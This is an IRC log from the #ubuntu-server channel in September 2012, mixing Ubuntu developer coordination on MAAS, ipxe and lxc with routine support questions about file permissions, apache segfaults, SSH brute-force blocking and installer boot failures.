<jamespage> hallyn, I can reproduce that at will if that helps
<jamespage> I reverted my kernel and I'm good for testing
<hallyn> jamespage: marked it critical prio.  might comment there that you're ready to test.  i'll leave it to kernel team unless they say otherwise
<tash> strange, am in group www-data and /var/www is www-data:www-data with 777 and I can't overwrite files via FTP
<tash> perms denied
<tash> any ideas?
<Gargoyle> tash: Don't use ftp!
<tash> well, it's winscp, port 22
<tash> so, sftp
<tash> still, odd that I can't overwrite files isn't it?
<Gargoyle> tash: if it really is 777, then it wouldn't matter what group you were in.
<Gargoyle> Anything in the logs?
<Gargoyle> What error msg do you get?
<tash> agreed on the 777, checking logs
<tash> this was just dumped on me
<tash> still investigating
<tash> nothing in /var/log/messages or /var/log/syslog, not sure which log to look at
<shauno> are the files you're trying to overwrite also owned by www-data ?
<Gargoyle> If it's a windows to linux transfer, could be worth checking that if its a case sensitivity issue (eg, the file is uploaded as Index.HTM, but the webserver is serving index.htm)
<tash> shauno: yes
<tash> Gargoyle: it is Windows -> Ubuntu Server, but never had issues before and use WinSCP all the time.
<tash> could it be trying to modify perms after the upload and maybe that is causing the issue?
<Gargoyle> could be. You actually need to be the Owner of the file to change it's permissions.
<Gargoyle> so if they are owned by www-data, you'll need to make them owned by you:www-data I think.
<tash> yep, that was it
<Gargoyle> annoying as hell! :)
<jamespage> lynxman, OK - I give up - how do I get ipxe to tell me exactly why it won't boot off my iscsi target
<jamespage> ubuntu installed to it just fine....
<lynxman> jamespage: hm... :)
<tash> so, even though perms are 777 on something you can't change perms unless you own the file? That is the lesson learned here right?
<lynxman> jamespage: afaik it should relate to the network card you have on the server
<lynxman> jamespage: there's quite a bunch of small bugs about this, we found one with TREllis 6 months ago
<jamespage> lynxman, I get an Input/Output error message only
<jamespage> it worked at alpha-3 frustratingly
<lynxman> jamespage: anywhere I can see a screenshot of those?
<jamespage> lynxman, not right this moment but it pointed me to http://ipxe.org/err/1d704439
<lynxman> jamespage: I'd say the driver got a reply it didn't expect
<lynxman> jamespage: although ipxe is mostly black magic, I'd contact the mailing list and hope for the best :)
<jamespage> lynxman, someone beat me to it...
<jamespage> http://ipxe.org/err/1d704439
<jamespage> http://lists.ipxe.org/pipermail/ipxe-devel/2012-September/001796.html
<jamespage> even
<jamespage> :-)
<lynxman> jamespage: so that's a high chance, I don't think our last ipxe update is from before May 16th
<jamespage> lynxman, feb
<lynxman> jamespage: yeah, so that'd make sense, although *crossing fingers* the package should be easy to update, and if not I'll be willing *steps forward* to update it
 * jamespage tries it
<roaksoax> Daviey: are we too late to upload maas to quantal?
<Daviey> roaksoax: no, i'd rather it was in there.
<Daviey> roaksoax: can i see the diff?
<roaksoax> Daviey: ok, I'll upload later today
<roaksoax> Daviey: ok, it will be a veeeeeeeeeeeeery long one :)
<roaksoax> Daviey: http://paste.ubuntu.com/1186109/
<uvirtbot> New bug: #1045923 in ipxe (main) "input/output error on iscsi sanboot from linux tgt" [Undecided,New] https://launchpad.net/bugs/1045923
<Daviey> roaksoax: best hold off, actually.
<roaksoax> Daviey: ok
<roaksoax> Daviey: it will keep growing though
<roaksoax> Daviey: right now it has been tested and has everything working but internal DNS/DHCP
<Daviey> roaksoax: can you comment on what the diff does?
<Daviey> how does it improve the beta?
<Daviey> ?
<roaksoax> Daviey: will do
<roaksoax> Daviey: i didn't upload anything on friday nor yesterday
<roaksoax> as some issue needed to be fixed
<roaksoax> ii'm just updating to latest branch and testing eeeeeverything again
<uvirtbot> New bug: #1045947 in lxc (universe) "lxc-net should not masquarade intra-container traffic" [High,Triaged] https://launchpad.net/bugs/1045947
<nandersson> Hi, I am setting up Ubuntu Core in a disk image. Got it to work, but now I would like to have my keyboard working. I installed the package keyboard-configuration, choose my keyboard and thought that would do it, but no. Still english keyboard. I have the right parameters in /etc/default/keyboard. Do I need to set some vars in .bashrc /etc/.profile or someplace?
<nandersson> Ok, I solved part of the problem by installing console-setup and configure it for UTF-8 and Latin1. Still don't get Ã¥Ã¤Ã¶ though :-(
<uvirtbot> New bug: #1045955 in lxc (universe) "lxc-create -t ubuntu-cloud broken on quantal images (no ubuntu user)" [Undecided,New] https://launchpad.net/bugs/1045955
<SuperLag> How can you find out what the dependencies are for $PACKAGE? is there an apt option that will do that?
<Nephelo> Hello, I've got a problem with my Ubuntu 10.04 Serversystem. I'm using mdadm (raid 5) and smbd for network shares. After a time the server freezes, only a reset helps. RAM is ok, and FS seems to. I tried to create an archive and this works. Nothing in syslog. Can someone help me?
<RoyK> Nephelo: cat /proc/mdstat
<RoyK> Nephelo: and use smartctl -H on all devs in that raid
<RoyK> Nephelo: and perahsp smartctl -t short for them
<Nephelo> RoyK The raid seems ok. But after a reset the raid starts with resync
<Nephelo> Ok, I'll try smartctl
<RoyK> Nephelo: if a drive hangs, it may hang the whole system
<Nephelo> RoyK: But I tried to create a big archiv and this works
<Nephelo> (using the comand line)
<Daviey> roaksoax: Hey, how are you doing with using the squashfs with MAAS?
<roaksoax> Daviey: well haven't really looked at it again yet as I was resolving issues with MAAS itself
<roaksoax>  Daviey going to start looking at it again once I finish this package testing
<Nephelo> RoyK: smartctl -H says for all devices that they passed the test
<adam_g> zul: do you know whats up with the python-quantumclient MIR? hasn't moved in a while but looks like the concerns have been addressed?
<zul> adam_g: no idea....lemme have a look
<Daviey> roaksoax: ok
<adam_g> zul: nosexcover is gone and the test suite is enabled. its now a dependency of nova and is blocking nova uploads to Q, which is why i ask.
<zul> yeah lemme bug mterry
<hallyn> pmatulis: hi, are there freeze dates relating to the server guide for quantal?
<roaksoax> Daviey: do yo want me to attach a diff?
<roaksoax> Daviey: to the FFe bug report?
<roaksoax> Daviey: cause I think I'm ready to upload
<pmatulis> hallyn: hi, i'm lagging behind this cycle for the guide.  i need to look into it
<Daviey> roaksoax: jfdi please
<Daviey> roaksoax: but please be around if it regresses to resolve
<roaksoax> Daviey: k cool :)
<hallyn> pmatulis: ok - there are several things in the lxc guide i need to update, but i'm hoping i can put that off a bit further as i chase some elusive bugs elsewhere :)
<roaksoax> Daviey: ok cool. The only "regression" is that dhcp seems to not be writing the config just yet, which leaves it unsuable for now, but that should be addressed very soon
<roaksoax> Daviey: due to the running our own maas dhcp upstart job
<Daviey> roaksoax: Remember that maas doesn't always run it's own dhcp
<Daviey> Many scenarios it will not.
<roaksoax> Daviey: yeah I'm much rather concerned on having maas fully supported now with correctly running external dns/dhcp rather than increasing the diff later in the release
<skrite> hey all
<roaksoax> Daviey: uploaded \o/
<Troy^> System restart required how often do those types of updates happen in server?
<roaksoax> Daviey: let me know when you approve maas please
<Daviey> roaksoax: done
<roaksoax> Daviey: thanks
<protoCall7> Hi all, I am attempting to install a Xen domU of Ubuntu Server 12.04 following the directions on the xen wiki @ http://wiki.xen.org/wiki/Ubuntu_10.04_domU, but I can not seem to get a boot loader to install.  Does anyone have any troubleshooting tips for tracking the problem down?
<uvirtbot> New bug: #1004238 in maas "cobbler sync not called after maas-dhcp configuration" [Low,Confirmed] https://launchpad.net/bugs/1004238
<uvirtbot> New bug: #1005388 in maas (main) "/etc/cron.d/maas-gc has wrong path to maas executable" [Undecided,Fix released] https://launchpad.net/bugs/1005388
<protoCall7> here are the relevant syslog entries regarding the grub failure: http://paste.ubuntu.com/1186449/
<smoser> hallyn, https://code.launchpad.net/~smoser/ubuntu/quantal/lxc/lp-1045955/+merge/122749
<hallyn> smoser: all the whitespace changes mask the meat of it
<hallyn> you're adding check for auth_key (not mentioned in changelog).  but i have no objection to what it claims to change.  I assume utlemming is happy with it too?
<hallyn> smoser: I'm adding some compile fixes right now too.  I'll copy in your .patch file if that's ok
<hallyn> (subject to beta freeze of course)
<uvirtbot> New bug: #1045986 in firefox (main) "Ubuntu AppArmor policy is too lenient with shell scripts" [Undecided,Confirmed] https://launchpad.net/bugs/1045986
<arrrghhh> hello.  i'd like to run logrotate more frequently than 'daily' - at least on one specific set of logs.
<arrrghhh> can i just put */10 * * * * logrotate in my root's crontab, or is there more to it?
<smoser> hallyn, the comment about auth_key is correctly in commit messages
<smoser> and i really suggest taking the wuite space changes too
<smoser> as that file is a mess.
<hallyn> smoser: pushed to ubuntu:lxc
<hallyn> smoser: yeah, that file is a mess, cause ppl insist on fighting 'et sw=8 ts=8' common-sense setting :)
<smoser> by just copying rather than merging you lose my per-commit commit messages.
<hallyn> (j/k on whitespace)
<smoser> hallyn, if i made invalid or inconsistent white space changes then you should reject it.
<smoser> but you really should set some '# vi:'
<hallyn> does all vi actually honor that?
<smoser> as that makes the one true editor "just work"
<hallyn> ISTM it generally ignores it
<smoser> set modeline modelines=3
<smoser> that searches top 3 and bottom the lines
<hallyn> so it only works when people want it to - in which case they can correctly set it by hand anyway
<hallyn> maybe those should be default in system-wide vimrc
<hallyn> but anyway
<hallyn> bzr merging with multiple quilt patches is not to be trusted.  sorry.  your commit msgs were lost.
<roaksoax> Daviey: ok so I tried to do the squashfs thing and a few thoughts:
<roaksoax> 1. Installer is being killed due to an apparent lack of memory
<hallyn> I always keep upstream-directed msgs in DEP-5 tags, and distro-directed in changelog
<roaksoax> 2. squid-deb-proxy doesn't allow to download the image, so I had to tweak squid0deb-proxy. For our case, I think it might be important to publish it in archive.u.c and download it and find a workaround
<smoser> hallyn, but if you're a developer, you want it to. and so you should set that.
<hallyn> in fact i think i'll copy yours into header
<smoser> and then go on with life.
<smoser> the reason its not default is
<smoser> http://www.vim.org/scripts/script.php?script_id=1876
<smoser> there are been issues at points in the past.
<smoser> i think it might be saner now.
<hallyn> smoser: are you forwarding that patch to lxc-devel or should i?
<smoser> http://lwn.net/Articles/20249/
<smoser> umm... you should :)
<hallyn> ok
<smoser> oh. and sorry i didn't do good patch headers there.
<smoser> it would hvae been ok for you to NAk and say that.
<smoser> hallyn,
<smoser> have you seen this
<smoser> with brfs
<smoser> $ sudo lxc-destroy --name precise-amd64
<smoser> rm: skipping `/var/lib/lxc/precise-amd64/rootfs', since it's on a different device
<smoser> result is tha ti can't kill that root
<smoser> i have to run now. will check in later.
<smoser> i thought i had set up for btrfs
<hallyn> smoser: hm.
<hallyn> smoser: someone changed the rm -rf to                 rm -rf --one-file-system --preserve-root $rootdev
<hallyn> git suggests it was me
<hallyn> bastard
<hallyn> we want that safety though, so i think the right answer is to first separately rm -rf --one-filesystem the $rootfs, then the $containerdir
<hallyn> i'll push a fix
<esuave> what is the difference between the /etc/rc.d/init.d/ directory and the /etc/init.d/?
<arrrghhh> esuave, well as i understand it the rc.d stuff is by runlevel
<arrrghhh> init.d is all the scripts for startup, regardless of runlevel
<esuave> ahh got ya! thanks!!
<hallyn> smoser: oh.  no.  that's already fixed in quantal.  but not in precise
<hallyn> if you feel that should be SRU'd, please do open a bug
<arrrghhh> esuave, that wasn't a great explanation.  this one is much better :)
<arrrghhh> http://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d
<arrrghhh> as my explanation really applies more to the rcX.d stuff
<esuave> ah yes this helps
<esuave> thank you
<arrrghhh> np
<Tellmarch> Hi... is there a way to allow a user to take ownership of folders/files owned by www-data?
<arrrghhh> Tellmarch, if you can change the ownership, chown
<arrrghhh> if you have to change the permissions without ownership, chmod
<Tellmarch> my problem is that there is a user, let's say user1, with a website in his home folder
<Tellmarch> however, php scripts create files there, owned by www-data
<Tellmarch> user1 is not an administrative account, so normally he can't do the chown (no rights to do so)
<arrrghhh> Tellmarch, chmod the files then
<Tellmarch> but i'd like to allow him to, without giving him full root access to the server
<arrrghhh> so more users/groups can access them
<arrrghhh> just chmod the files he needs to access
<Tellmarch> files might be created by php in the future, i want him to be able to do it
<Tellmarch> or can i change the default permissions for files created by apache?
<arrrghhh> cron job?
<arrrghhh> hrm, you might be able to
<arrrghhh> above my pay grade... i guess it really depends on how the files are created and for what purpose.... but again, i am pretty green with apache.
<Tellmarch> basically he has a (heavy) php web application, which can install new modules directly from the web administration page etc.
<Tellmarch> which means new files created, owned by www-data instead of user1...
<arrrghhh> ah
<arrrghhh> yea, i'd say you'll have to ensure the web app is creating the files with the appropriate permissions
<arrrghhh> or create a cron job that chmod's the files - not exactly pretty.
<Tellmarch> yeah that would be easy enough to do... but if for some security reason he wants some strange permissions on few files, might be dangerous
<Tellmarch> though doing chown -R on the root of the website should be fine I guess
<Tellmarch> ok, thanks for the hints
<arrrghhh> np
<arrrghhh> yea, if you limit the chmod to his website directory, it shouldn't be too dangerous
<arrrghhh> just dangerous for his site potentially ;)
<Tellmarch> one other idea I had was to allow user1 to run chown as www-data, in the sudoers file... But i don't know much about sudoers, so i'm not even sure if it's possible
<Tellmarch> I think if I can do that it would be safe, nothing else should be owned by www-data in the server...
<arrrghhh> Tellmarch, why not just add his user to the www-data group?
<Tellmarch> because the default permissions are 755 :(
<Tellmarch> it was my first idea too ^^
<arrrghhh> ah
<arrrghhh> heh
<arrrghhh> sounds so simple :P
<uvirtbot> New bug: #1024281 in python-glanceclient (main) "Bug during installation. conflicts: python-glanceclient + glance-client" [Undecided,Fix released] https://launchpad.net/bugs/1024281
<kyle__> Where do you set the system-wide defaults ala gsettings (previously gconf) in 12.04?
<arrrghhh> kyle__, doesn't really apply to the -server platform - does it?
<kyle__> arrrghhh: No, but mostly it only applies to people running multiple workstations at work, and they tend to hang out more in server.
<arrrghhh> kyle__, ok...
<arrrghhh> just checking.  my server has no gnome ;)
<kyle__> arrrghhh: Technically, _technically_ I'm dealing with server, as I installed the minimal, then apt-get installed unity-desktop ;)
<arrrghhh> i'm sorry.
<kyle__> arrrghhh: No better way of handling cloud-desktops run off of 'buntu.  Using vncserver is _much_ more efficient than running vino or whatever with X running on a virtual video card provided by KVM.
<arrrghhh> i just ssh, but i'm only managing a couple of servers.
<kyle__> arrrghhh: I've got one for nearly every student in the department.
<arrrghhh> heh
<arrrghhh> my ubuntu usage is a bit more limited than that...
<kyle__> arrrghhh: Most of them will use the VM once, and forget about it.  But it will be required for some of the classes.  And I'm hoping those students go away feeling like this is a great system.  Hoping.
<kyle__> s/will be/is/
<Gargoyle> How much overhead is involved if I install gdb on a server? I've tried cloning the exact same config onto another machine, but I can't get apache to segfault on the test machine.
<arrrghhh> hah
<Gargoyle> Or can anyone suggest any other method for tracking down a segfault without installing all the gdb stuff on a live server?
<Tellmarch> well just installing gbd doesn't change much i think, but you'd have to run apache in gdb i guess?
<Tellmarch> ... haven't used gdb since my C programming days, about 10 years ago...
<Gargoyle> Tellmarch: I've never used it. But from googling up some docs, I was wondering if I needed to install dev libraries that contain all the debug symbols?
<Tellmarch> well I don't think debugging apache on your live server is really what you want to do
<Tellmarch> yes, you'd need apache with the debugging symbols too...
<Tellmarch> apache logs don't tell you anything of value?
<Gargoyle> [notice] child pid 12698 exit signal Segmentation fault (11)
<Gargoyle> That's all!
<Gargoyle> Sometimes apache carries on, othertimes it locks up and the load balancer deletes it from the pool!
<Tellmarch> not very informative :(
<Gargoyle> Can I get apache to be a bit more informative? or dump a core or something that might be of use?
<Tellmarch> I'm not sure...
<Tellmarch> but running apache in gdb means compiling it with the debugging symbols
<Tellmarch> quite a bit of work
<Tellmarch> CoreDumpDirectory /tmp/apache
<Tellmarch> there seems to be an option to get the core dump
<Gargoyle> Yeah, at which point the apache you are debugging is no longer the same as the running one!
<Gargoyle> I'll see if I can get get something from a core dump. Or perhaps I can get the PID output into access.log too, so at least I can try and track down which part of the web app is crashing it?
<Tellmarch> is it a php web app?
<Gargoyle> yup
<Tellmarch> some people recommend xdebug...
<Gargoyle> Ah. Maybe I can get something from that.
<Tellmarch> though it's better to use it on a dev environment, not production...
<Tellmarch> and if you can't reproduce, that won't help '^^
<soren> adam_g: Do you have any idea why all of glance's dependencies on its own binaries are so strictly versioned?
<soren> adam_g: It has well and thoroughly painted itself into a corner on my laptop due to this.
<arrrghhh> so anyone manage disk space using a web interface?
<arrrghhh> i was looking at dfweb, but i can't seem to get it working.
<adam_g> soren: looking thru history for the what/when/why now, but i can certainly see issues with attempting to use, say, the wrong python-glance with the server(s)
<adam_g> looks like its been that way since the beginning?  what are you running into exactly?
<adam_g> soren: ^
<zul> adam_g: did you get quantumclient seeded?
#ubuntu-server 2012-09-05
<adam_g> zul: no
<zul> adam_g: lemme just finish dinner and ill do it
<adam_g> zul: what needs to be done do it, exactly?
<zul> adam_g:  add it to the lp:~ubuntu-core-dev/quantal/seeds basically
<zul> then magic
<adam_g> zul: oh, i guess i can do it and send a merge proposal if you don't want to
<zul> adam_g: probably faster if i just did it
<adam_g> cool go for it. dont forget python-cliff-tablib too
<zul> you mean cliff-tablib
<zul> actually i think cliff-tablib will be picked up automatically as well, anyways done
<adam_g> zul: nice, thanks
<smoser> hallyn, that was quantal
<hallyn> smoser: can you file a bug?  i'ts supposed to do that (in the block starting at line 180)
<blackshirt> hello
<AaronMickDee> hi...
<koolhead17> morning all
<Gargoyle> morn'
<Gargoyle> So I enabled logging in debug mode and CoreDumpDirectory, apache client process segfaulted about an hour ago and I have nothing useful in my log and no core dump.
<uvirtbot> New bug: #989841 in mysql-5.5 (main) "package mysql-server-5.5 5.5.22-0ubuntu1 failed to install/upgrade: ErrorMessage: subprocess installed post-installation script returned error exit status 1" [Undecided,Expired] https://launchpad.net/bugs/989841
<uvirtbot> New bug: #1021573 in qemu-kvm (main) "package qemu-kvm 1.1~rc+dfsg-1ubuntu5 failed to install/upgrade" [High,Expired] https://launchpad.net/bugs/1021573
<uvirtbot> New bug: #1045342 in mysql-5.5 (main) "partition by range on multiple col. primary key w/ no maxvalue restarts server (dup-of: 1033724)" [Undecided,New] https://launchpad.net/bugs/1045342
<uvirtbot> New bug: #1046115 in cloud-init (main) "package lists are broken after first boot" [Undecided,New] https://launchpad.net/bugs/1046115
<uvirtbot> New bug: #1046117 in lxc (universe) "btrfs via symlink not working" [Undecided,New] https://launchpad.net/bugs/1046117
<adac> hi guys. how to add an existing user to a group?
<tinyhippo> gpasswd -a user group
<ffunenga> hello
<ffunenga> I've found something in my /var/log/auth.log
<ffunenga> and I would like to ask for help
<ffunenga> "Failed password for invalid user root from 202.138.126.128 port 39399 ssh2"
<ffunenga> and that ip has failed more attempts every day
<jamespage> lynxman, a new snapshot of ipxe fixed my issue
<Troy^> ffunenga: block that ip if it is from the same ip
<jamespage> lynxman, wish I had spotted this before feature freeze....
<ffunenga> Troy: I've user "sudo iptables -A INPUT -s  202.138.126.128 -j DROP"
<ffunenga> is there any tool to block any IP that tries to access the root account via ssh?
<RoyK> !ufw
<ubottu> Ubuntu, like any other Linux distribution, has firewall capabilities built-in. The firewall is managed using the 'ufw' command - see https://help.ubuntu.com/community/UFW | An alternative to ufw is the 'iptables' command - See https://help.ubuntu.com/community/IptablesHowTo | GUI frontends such as Gufw (GNOME) and Guarddog (KDE from Lucid onwards) also exist.
<RoyK> !denyhosts
<RoyK> ffunenga: denyhosts will block ip's from which illegal login attempts come
<RoyK> ffunenga: I use it on my servers
<RoyK> ffunenga: it's rather triggerhappy on failed root login attempts ;)
<ffunenga> I didnt know ufw, it seems great. Ok I will now test denyhosts
<ffunenga> thanks
<Tellmarch> ffunenga, root is disable by default for ssh anyway
<RoyK> ufw is neat
<Tellmarch> so there is no risk
<RoyK> but doesnÂ§t support all of iptables' stuff
<RoyK> Tellmarch: it's not disabled by default, but by default, there's no root password, so ssh as root won't work. default ssh settings is to *allow* root login
<Tellmarch> really?
<Tellmarch> well, it's the same, no matter how long he tries, he won't find the password
<RoyK> sshd will, by default, not allow login to an account without a password
<Tellmarch> you're right, PermitRootLogin yes.... I thought this was "no" in the past...
<RoyK> but if you set a root password, you will be allowed ssh in, unless you reconfigure sshd
<RoyK> it's usually 'no' on my machines ;)
<ffunenga> Tellmarch: I've inserted a rule in /etc/ssh/sshd_config that only lets my user access the server: "AllowUser ffunenga"
<Anomie21> Trying to uninstall MySQL so I can reinstall but I keep getting this error Processing was halted because there were too many errors.
<Anomie21> E: Sub-process /usr/bin/dpkg returned an error code (1)
<Sachin__> does flock() work at thread level or process level/
<Sachin__> does flock() work at thread level or process level?
<koolhead17> DavidLevin: around
<koolhead17> Daviey:
<Daviey> koolhead17:
<jamespage> smb, your cirrus driver symptoms look just like mine BTW - it certainly does not fail all of the time
<smb> jamespage, Yeah, it fails when the cirrus module fails the VRAM setup. Just don't know why, yet.
<jamespage> smb, well if you need me to poke anything to help out just let me know
<smb> jamespage, Sure, at least I know understand the random behaviour. Does not help when one had also wiggled around with boot options at the same time...
<xnox> well it's always reproducible if I have full disk encryption.
<xnox> e.g server or desktop installer choose full-disk encryption.
<xnox> every reboot. and me and slangasek did many reboots while trying to triange if it was grub/plymouth or kernel issue. and we deducted it to be kernel.
<xnox> every boot fails.
<xnox> plus note that every other boot is possibly in grub's last-boot-failed code path so boot experience is the same.
<xnox> s/is the same/slightly different/ =)
<uvirtbot> New bug: #1046278 in ceph (main) "rest-bench always fails on initial execution" [Undecided,New] https://launchpad.net/bugs/1046278
<smoser> hallyn,
<smoser> bug 1046117
<uvirtbot> Launchpad bug 1046117 in lxc "btrfs via symlink not working" [Undecided,New] https://launchpad.net/bugs/1046117
<smoser> hallyn, ping
<smoser> i'm wondering how i get output of:
<smoser>  sudo lxc-start --name=$R-amd64 -- /sbin/init --verbose
<smoser> rbasak, so i'm pretty sure that your issue is different than the lxc wone we were seeing
<smoser> as in your case eth0 is comming up but events are somewhere etting lost
<rbasak> It seems that eth0 is being brought up after cloud-init-nonet has timed out
<smoser> but in the lxc case (that forced us to add 'start networking') it seems that the networking for the given nic never cam eup
<rbasak> And that bringing eth0 up (or at least running ifup.d) is being blocked when cloud-init-nonet blocks.
<smoser> rbasak, that makes sense.
<tdr112> I wonder can anyone help me, i am installing from usb on a server i pick install ubuntu then i get a blank screen
<smoser> i know that at one point we had a better undersanding of this problem (at least the lxc ase)
<rbasak> smoser: one thing that concerns me is that I'm using hackery to generate the image in the first place, and I wonder if this is introducing a problem. How soon could you publish official armhf/highbank dailies to eliminate this?
<smoser> what hackery are you using ?
<smoser> nothign you've shown me would cuase this.
<smoser> so unless you've been lying to me.
<smoser> hm..
<rbasak> I'm using dannf's Makefile
<rbasak> That's it really
<smoser> but i should look again at dannf's make file i guess.
<smoser> link ?
<rbasak> I modified it to use -proposed (for a highbank kernel fix I need)
<rbasak> smoser: https://code.launchpad.net/~racb/maas/maas.ubuntu.com.images-ephemeral-arm
<smoser> dannf sure loves 'cat'
<rbasak> Yeah I did see a few extra ones in there
<smoser> i really dont see anythign there that would cuase this
<smoser> stgraber, sorry to always use you as my "hallyn isn't here fallback"
<smoser> but do you know how i can get output of init from 'lxc-start .... -- /sbin/init --verbose' ?
<smoser> i'm basically getting nothing.
<stgraber> smoser: hmm, that should work... I'd suggest pinging jodh as he's been using lxc quite a bit for upstart development and testing
<smoser> stgraber, you'd expect that to just go right to the console that i'm looking at?
<stgraber> yeah and I'd assume it'd also end up in some kind of log somewhere...
<smoser> jodh seems not around :-(
<stgraber> smoser: gah, right, forgot, he's off until Monday...
<smoser> i was testing quantal running precise
<smoser> i will now test precise urnning precise
 * hallyn reads up
<smoser> but i swear that when i was debugging bug 800824 this used to work.
<uvirtbot> Launchpad bug 800824 in cloud-init "cloud-init-nonet times out in lxc" [High,Fix released] https://launchpad.net/bugs/800824
<hallyn> smoser: how about 'lxc-start -c consoleoutput .... -- /sbin/init --verbose' ?
<hallyn> oh wait
<smoser> i got the same result with --console=/tmp/out as was going to console
<hallyn> right
<hallyn> init takes its arguments though env
<hallyn> i.e. we pass 'container=lxc' to init by doing putenv("container=lxc")
<smoser> hallyn, what?
<smoser> init says it takes arguments via cmdline
<smoser> its cmdline
<hallyn> it takes them from the kernel's cmdline
<hallyn> the kernel provides that to init through env
<koolhead17> :)
<koolhead17> Daviey: it was my stupidity
<koolhead17> now nova/quantum
<koolhead17> glance okey !!
<uvirtbot> New bug: #1046330 in php5 (main) "Incorrect crypt() function behavior" [Undecided,New] https://launchpad.net/bugs/1046330
<smoser> hallyn,so are you saying what i want to do is impossible?
<smoser> because i swear this used to work
<hallyn> smoser: no.  I haven't gotten it to work.   BUT I think it has to do with how we're doing 'console' file now.
<smoser> i swear it worked when i was debugging this bug the first time.
<smoser> but it seems broken in precise also
<uvirtbot> New bug: #1046340 in ntp (main) "ntp package missing logcheck exceptions file /etc/logcheck/ignore.d.server/ntp" [Undecided,New] https://launchpad.net/bugs/1046340
<jamespage> Daviey, hallyn: how would you guys feel about a new ipxe snapshot for quantal?
<jamespage> I hit a bug yesterday with regards to IPXE iscsi san booting - its already reported upstream and is fixed in upstream git repo
<jamespage> however it appears to be hard to say - "yeah - you need this commit"
<hallyn> jamespage: sounds good.  mind pushing it?
<jamespage> hallyn, it will need a FFe really
<hallyn> why?  it sounds like it's broken
<hallyn> not a feature
<jamespage> well it works for most use cases
<jamespage> I'm sure there are lots of other new features since the snapshot from feb we currently have
<jamespage> 380 commits worth of stuff
<hallyn> but oh i misunderstood
<jamespage> to get up-to-date with HEAD
<jamespage> if I could pick a specific commit for a patch I would had JFDI'ed it
<hallyn> right
<jamespage> (after beta-1 of course as its seeded)
<hallyn> have you asked in -release?
<jamespage> not yet
<jamespage> bug 1045923 for reference
<uvirtbot> Launchpad bug 1045923 in ipxe "input/output error on iscsi sanboot from linux tgt" [Undecided,New] https://launchpad.net/bugs/1045923
<hallyn> smoser: yeah i can't even see the arguments in /proc/cmdline or /proc/1/cmdline in the container.
<tdr112> hello all, I have been trying to use nomodeset to slove my boot problems with no luck
<hallyn> whereas 'lxc-start -n qlvm1 -- /bin/bash -c /bin/ps -ef' does pass the arguments
<hallyn> so upstart seems to be (newly) dropping them
<tdr112> anything else i could try
<Daviey> jamespage: a newer ipxe sounds good imo
<jamespage> Daviey, is 380 commits going to cause me grief for a FFe?
<jamespage> I tested it locally for my problem and it works just fine
<Daviey> jamespage: i don't think so.. if hallyn is happy from a kvm PoV.
<czajkowski> tdr112: ello
<jamespage> Daviey, hallyn (+ anyone else): if I stick this in a PPA would you be OK to give it a sniff as well
<jamespage> ?
<hallyn> jamespage: sure, though i don't have any exotic tests or test recipes
<jamespage> hallyn, just 'it didn't break kvm for me' would be good
<hallyn> wonder if lynxman in his new role woudl still have use for testing it
<czajkowski> tdr112: what issue are you having ?
<tdr112> on a new server i cant get ubuntu to install, i am getting a blank screen after grub , i have tried NOMODESET but that does not help
<czajkowski> most odd
<czajkowski> Daviey: can you point tdr112 in the right direction please....
<tdr112> to give more info its a dell r420
<tdr112> booting from usb, I have tested the usb on another server and it boots to the installer fine
<hallyn> smoser: do you find btrfs containers to actually be usable right now?
<hallyn> (gauging importance of bug 1046117)
<uvirtbot> Launchpad bug 1046117 in lxc "btrfs via symlink not working" [Medium,Triaged] https://launchpad.net/bugs/1046117
<hallyn> every time i try btrfs i get corruption
<smoser> hallyn, no
<smoser> well, i dont know.
<smoser> i opened that bug
<smoser> because dielete didn't work
<hallyn> right.  but if btrfs is unstable anyway then that bug becomes low priority :)
<hallyn> but all right, fix should be simple.  I'l lstage it in ubuntu:lxc for now.
<hallyn> smoser: setting up an oneiric container right now to see if it'll work with init --verbose
<smoser> hallyn, well, both host and guest oneiric would be what i would have used
<smoser> as there was no quantal host at that point
<skrite> anyone running a mysql-cluster with also non-cluster tables in the same sql?
<hallyn> smoser: yup, might nest if i have to :)
<lynxman> hallyn: I'd gladly :)
<smoser> hallyn, i'd trust htat result about as much as btrfs (nested)
<hallyn> lynxman: \o/ thanks :)
<hallyn> smoser: stgraber does it all the time
<hallyn> have faith!
<josepht> anyone know how to construct a menuentry for grub2 to boot an ubuntu-server iso?
<smoser> tdr112, it'd be "nomodeset", not the capital
<jamespage> hallyn, lynxman: hold the line - just spotted another commit that might fix it - trying now...
<tdr112> smoser: i did try it in lowercase
<smoser> http://paste.ubuntu.com/1187381/
<smoser> i add that into /etc/default/grub
<smoser> and sudo update-grub
<smoser> tdr112, also, you can check if you're actually booting correctly or not. if you are seeing a grub prompt, its quite possible that you're booting up fine (getting network and everything) just blindly.
<smoser> then ssh in and poke around
<tdr112> smoser: its a blank system , i dont think the installer will have an ssh server on it
<smoser> oh. i see. this is off the cd install. i thought you were saying afterwards.
<smoser> how did you create the usb disk?
<smoser> and from what iso?
<tdr112> ubuntu-12.04.1-server-amd64.iso
<smoser> how did you create?
<tdr112> using unetbootin
<smoser> i've never used that. but i would suggest trying with usb-creator-gtk before anything else.
<tdr112> ok thanks smoser will do
<jamespage> hallyn, lynxman, Daviey: OK - so that second patch fixed my bug; I'll defer the new snapshot until next release...
<lynxman> jamespage: great \o/
<tdr112> smoser: bad live usb , working now thanks
<hallyn> jamespage: cool, thanks much
<smoser> tdr112, good deal.
<uvirtbot> New bug: #1046397 in maas (main) "The DHCP config file does not get written." [Undecided,New] https://launchpad.net/bugs/1046397
<zul> soren: ping
<hallyn> stgraber: hm.  i didn't do it.  But I assume you'd want clear_config() to be exported through the api?
<hallyn> (note, a package fixing all your woes should be built in ppa:serge-hallyn/virt.  i'm still testing)
<hallyn> yup, test.create("ubuntu") ends up with a nicely reloaded config
<stgraber> hallyn: exporting clear_config() would be nice indeed. I don't have an immediate need for it, but that might change in the future.
<hallyn> stgraber: I assume that would be deemed a new feature, alas
<hallyn> simple enough to do though.
<hallyn> let's let the current pending stuff settle a bit and then i'll export clear_config in my github tree
<stgraber> hallyn: yeah, that'd be a new feature, so will just keep it in git for now
<lickalott> gents,  installed /boot on sda.  i have an sdb, sdc and sdd available that i have mounted in fstab and shared out through nfs.  problem is....sometimes the mounts don't take because /boot randomly jumps to sdb.  can i make the system always use sda for the OS?
<Tellmarch> lickalott, you can give the mount throught the UUID instead of sda-d
<Tellmarch> this way it's always the same thing
<lickalott> i just learned about blkid 10 mins ago, so i'm sure I could but I don't really understand how to do it.
